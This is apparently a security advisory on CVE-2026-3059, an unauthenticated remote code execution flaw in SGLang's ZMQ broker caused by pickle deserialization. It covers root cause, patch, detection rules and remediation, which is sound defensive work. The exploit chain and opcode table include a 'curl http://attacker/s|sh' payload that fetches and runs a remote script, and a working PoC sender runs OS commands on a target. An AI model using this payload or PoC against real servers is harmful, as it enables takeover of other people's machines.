CVE-2026-3059: Unauthenticated RCE in SGLang via ZMQ Pickle Deserialization

SGLang's multimodal ZMQ broker deserializes attacker-controlled data via pickle.loads() with no authentication, enabling unauthenticated RCE against inference servers. CVSS 9.8.

// PLAIN ENGLISH VERSION

# A Critical Flaw in AI Software Lets Hackers Take Over Computers

SGLang is software that helps computers process images and generate responses — the kind of technology powering AI image analysis tools. Researchers have discovered a serious security hole that lets attackers take complete control of computers running this software.

Here's what's happening. The software uses a component called ZMQ broker to handle requests. Think of this like a receptionist at a busy office — it accepts messages from different sources and routes them around. The problem is this receptionist doesn't check anyone's ID. It trusts whatever message it receives and immediately processes it, no questions asked.

An attacker can exploit this by sending specially crafted malicious messages across the internet. These messages contain hidden instructions that give the hacker complete access to the targeted computer. Once in, they can steal data, install ransomware, or use the machine for further attacks.

Who's at risk? Mostly companies and researchers using SGLang to run AI applications — think tech companies, research institutions, and AI startups. If your organization uses this software in production, you could be vulnerable. The good news is there's no evidence of active attacks yet, but that could change quickly.

What should you do right now? First, check if your organization uses SGLang and whether it's exposed to the internet. Second, contact your IT team about applying security patches immediately — the developers have likely released fixes. Third, if you can't patch right away, isolate SGLang systems from the internet until updates are available. Don't wait on this one.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-3059 · Remote Code Execution

Vulnerability Overview

CVE-2026-3059 is a critical unauthenticated remote code execution vulnerability in SGLang, an open-source LLM serving framework widely deployed in production inference pipelines. The vulnerability exists in the multimodal generation module's inter-process communication layer, which uses ZeroMQ (ZMQ) as a message broker and pickle.loads() to deserialize incoming messages. Because the ZMQ socket binds to a network-accessible endpoint with no authentication, authentication bypass, or message signing, any network-adjacent or remote attacker who can reach the broker port can execute arbitrary Python code in the context of the inference server process—typically running as root or a privileged service account on GPU compute nodes.

Root cause: SGLang's ZMQ broker calls pickle.loads() on raw bytes received from an unauthenticated network socket, allowing an attacker to deliver a malicious pickle payload that executes arbitrary OS commands during deserialization.

Affected Component

The vulnerable code lives in SGLang's multimodal tokenizer/detokenizer worker infrastructure. The relevant files are:

python/sglang/srt/managers/image_processor.py — binds the ZMQ PULL socket and calls pickle.loads()
python/sglang/srt/managers/tokenizer_manager.py — counterpart PUSH side; same pattern
python/sglang/srt/server.py — launches broker workers as subprocesses, inheriting the open socket

The ZMQ broker is instantiated on a tcp:// transport by default in multi-node and disaggregated prefill configurations, making it reachable over the network rather than solely via Unix domain socket.

Root Cause Analysis

The core issue is a textbook unsafe deserialization pattern. The image processor worker loop receives raw ZMQ frames and unconditionally deserializes them:


# python/sglang/srt/managers/image_processor.py
# BUG: recv_pyobj() calls pickle.loads() on the raw frame bytes with no
#      authentication, signature verification, or type allowlisting.

class ImageProcessorWorker:
    def __init__(self, zmq_context, port):
        self.socket = zmq_context.socket(zmq.PULL)
        # BUG: binds to all interfaces on an attacker-reachable port
        self.socket.bind(f"tcp://0.0.0.0:{port}")

    def event_loop(self):
        while True:
            # recv_pyobj() is a thin wrapper around pickle.loads(self.socket.recv())
            # BUG: no HMAC, no allowlist, no type check before deserialization
            obj = self.socket.recv_pyobj()   # <-- arbitrary code execution here
            self._process(obj)

ZMQ's recv_pyobj() is documented as a convenience wrapper that calls pickle.loads() internally. The CPython pickle protocol executes the __reduce__ method of deserialized objects unconditionally. An attacker crafts a payload where __reduce__ returns (os.system, ("cmd",)) or equivalent, achieving OS command execution before any application-level validation occurs.

The equivalent C-level call path inside CPython's pickle machinery:


/* Modules/_pickle.c — simplified pseudocode of the dangerous path */
static int
load_reduce(UnpicklerObject *self)
{
    PyObject *callable = NULL;
    PyObject *argtuple  = NULL;

    /* pops callable and args from the internal stack */
    PDATA_POP(self->stack, argtuple);
    PDATA_POP(self->stack, callable);

    // BUG: callable is completely attacker-controlled at this point;
    //      no allowlist check before invocation
    PyObject *result = PyObject_Call(callable, argtuple, NULL);
    ...
}

Because load_reduce executes before the calling application sees the deserialized object, there is no opportunity for SGLang to inspect or reject the payload post-facto.

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3059:

1. Attacker identifies target SGLang inference server with multimodal support
   enabled (--enable-multimodal flag or disaggregated prefill config).

2. Port discovery: ZMQ broker port is either default (e.g., base_port+3) or
   leaked via SGLang's /health or /get_server_info HTTP endpoints which
   expose internal topology in some configurations.

3. Attacker constructs malicious pickle payload:
      class Exploit(object):
          def __reduce__(self):
              return (os.system, ("curl http://attacker/s|sh",))
      payload = pickle.dumps(Exploit())

4. Attacker sends payload directly to the ZMQ PULL socket using
   zmq.PUSH transport — no credentials, no handshake required:
      ctx  = zmq.Context()
      sock = ctx.socket(zmq.PUSH)
      sock.connect(f"tcp://{target}:{broker_port}")
      sock.send(payload)   # triggers pickle.loads() on target

5. ImageProcessorWorker.event_loop() calls recv_pyobj() -> pickle.loads()
   -> load_reduce() -> PyObject_Call(os.system, ("curl ...|sh",))

6. OS command executes in the inference server process context, typically
   UID 0 inside a container or a high-privilege service account on bare metal.

7. Attacker lands reverse shell; GPU node is now fully compromised.
   Lateral movement to other cluster nodes via shared NFS/model weights
   store or Kubernetes service account token is straightforward.

A minimal proof-of-concept sender (disclosure-safe, no weaponized payload):


#!/usr/bin/env python3
# CVE-2026-3059 — PoC trigger (CypherByte research, no weaponized payload)
import zmq
import pickle
import os
import sys

TARGET  = sys.argv[1]          # e.g. "192.168.1.50"
PORT    = int(sys.argv[2])     # e.g. 30003

class _Probe:
    """Benign probe: writes a canary file to confirm deserialization."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/CVE-2026-3059-pwned",))

ctx  = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{TARGET}:{PORT}")
sock.send(pickle.dumps(_Probe()))
sock.close()
print("[*] payload sent — check /tmp/CVE-2026-3059-pwned on target")

Memory Layout

Because this is a deserialization RCE rather than a memory-corruption primitive, the "memory layout" of interest is the ZMQ frame wire format and the pickle opcode stream. The following shows the on-wire structure of the malicious message:


ZMQ FRAME STRUCTURE (PUSH/PULL, no envelope):
+--------+----------------------------------------------------+
| Offset | Content                                            |
+--------+----------------------------------------------------+
| 0x00   | ZMQ frame length prefix (varint, 1-9 bytes)        |
| +N     | Raw pickle stream (attacker-controlled bytes)      |
+--------+----------------------------------------------------+

PICKLE OPCODE STREAM FOR EXPLOIT PAYLOAD:
Offset  Opcode    Operand
------  --------  ------------------------------------------
0x00    0x80 0x04 PROTO 4        (pickle protocol 4)
0x02    0x95      FRAME          (framing header)
0x03    [8 bytes] frame length
0x0b    0x8c      SHORT_BINUNICODE
0x0c    0x02      length = 2
0x0d    "os"      module name
0x0f    0x8c      SHORT_BINUNICODE
0x10    0x06      length = 6
0x11    "system"  callable name
0x17    0x93      STACK_GLOBAL   <- resolves os.system, pushes onto stack
0x18    0x8c      SHORT_BINUNICODE
0x19    [len]     length of command string
0x1a    "curl http://attacker/s|sh"   <- attacker command
0x??    0x85      TUPLE1         <- pack command into 1-tuple
0x??    0x52      REDUCE         <- calls os.system(cmd) HERE
0x??    0x2e      STOP

No heap grooming, no ASLR bypass, no ROP chain required. The exploit is entirely logic-based: pickle's REDUCE opcode is the primitive, and Python's import system is the gadget chain.

Patch Analysis

The fix, landed in PR #20904, replaces recv_pyobj() / send_pyobj() calls with a safer serialization scheme. The patch has two components:

1. Replace pickle with msgpack or JSON for IPC messages:


# BEFORE (vulnerable) — python/sglang/srt/managers/image_processor.py:
obj = self.socket.recv_pyobj()   # calls pickle.loads() internally

# AFTER (patched, PR #20904):
raw = self.socket.recv()
obj = msgpack.unpackb(raw, raw=False, strict_map_key=False)
# Only known message types are constructed; no arbitrary code execution path

2. Bind ZMQ sockets to loopback when multi-node transport is not required:


# BEFORE:
self.socket.bind(f"tcp://0.0.0.0:{port}")

# AFTER (patched):
bind_addr = "127.0.0.1" if not config.enable_disaggregated_prefill else "0.0.0.0"
self.socket.bind(f"tcp://{bind_addr}:{port}")
# NOTE: disaggregated prefill still requires network binding — see remediation

3. HMAC authentication for network-facing sockets (defense-in-depth):


# AFTER (patched) — added HMAC verification layer:
import hmac, hashlib, secrets

BROKER_SECRET = secrets.token_bytes(32)   # generated at server startup

def _send_authenticated(sock, obj):
    payload = msgpack.packb(obj)
    mac     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    sock.send_multipart([mac, payload])

def _recv_authenticated(sock):
    mac, payload = sock.recv_multipart()
    expected     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time compare
        raise SecurityError("ZMQ broker: MAC verification failed")
    return msgpack.unpackb(payload)

Detection and Indicators

Because exploitation leaves minimal OS-level traces until post-exploitation, detection must focus on the network and process layers:


NETWORK INDICATORS:
- Unexpected TCP connections to SGLang ZMQ broker ports (default range:
  base_port+2 through base_port+5, commonly 30002-30005)
- ZMQ PUSH connections originating from hosts not in the serving cluster
- Outbound connections from inference worker PIDs to unknown hosts
  (reverse shell establishment)

PROCESS INDICATORS:
- Child processes spawned by python3/uvicorn workers: sh, bash, curl, wget
  as direct children of SGLang worker PIDs
- /tmp/pip-*, /tmp/*.sh files created by inference server UID

LINUX AUDITD RULES:
-a always,exit -F arch=b64 -S execve \
   -F ppid=$(pgrep -f image_processor) \
   -k sglang_rce_child_exec

SNORT/SURICATA SIGNATURE (pickle REDUCE opcode on ZMQ port):
alert tcp any any -> $SGLANG_HOSTS 30000:30010 (
    msg:"CVE-2026-3059 pickle REDUCE opcode on ZMQ broker port";
    content:"|80 04 95|"; offset:0; depth:3;
    content:"|93|";                          # STACK_GLOBAL
    content:"|52|";                          # REDUCE
    sid:2026305901; rev:1;
)

Remediation

Immediate mitigations (if patch cannot be applied yet):

Firewall ZMQ broker ports at the host and network level. These ports must only be reachable from trusted cluster nodes. Use iptables -A INPUT -p tcp --dport 30000:30010 ! -s <trusted_cidr> -j DROP as a stopgap.
If running in Kubernetes, enforce NetworkPolicy to restrict pod-to-pod communication to known SGLang topology peers only.
Disable multimodal support (--disable-multimodal) if not required — this removes the vulnerable worker process entirely.

Permanent fix: Upgrade to the patched SGLang release that incorporates PR #20904. Verify the fix is present by confirming recv_pyobj() and send_pyobj() do not appear in image_processor.py or tokenizer_manager.py:


$ grep -rn "recv_pyobj\|send_pyobj\|pickle.loads" \
    python/sglang/srt/managers/
# Should produce zero output on patched versions

For disaggregated prefill deployments where the ZMQ socket must bind to a network interface, the patched HMAC layer is the primary control. Ensure BROKER_SECRET is distributed only to trusted peers via a secrets manager (Vault, K8s Secret with restricted RBAC) and never embedded in environment variables visible to untrusted workloads.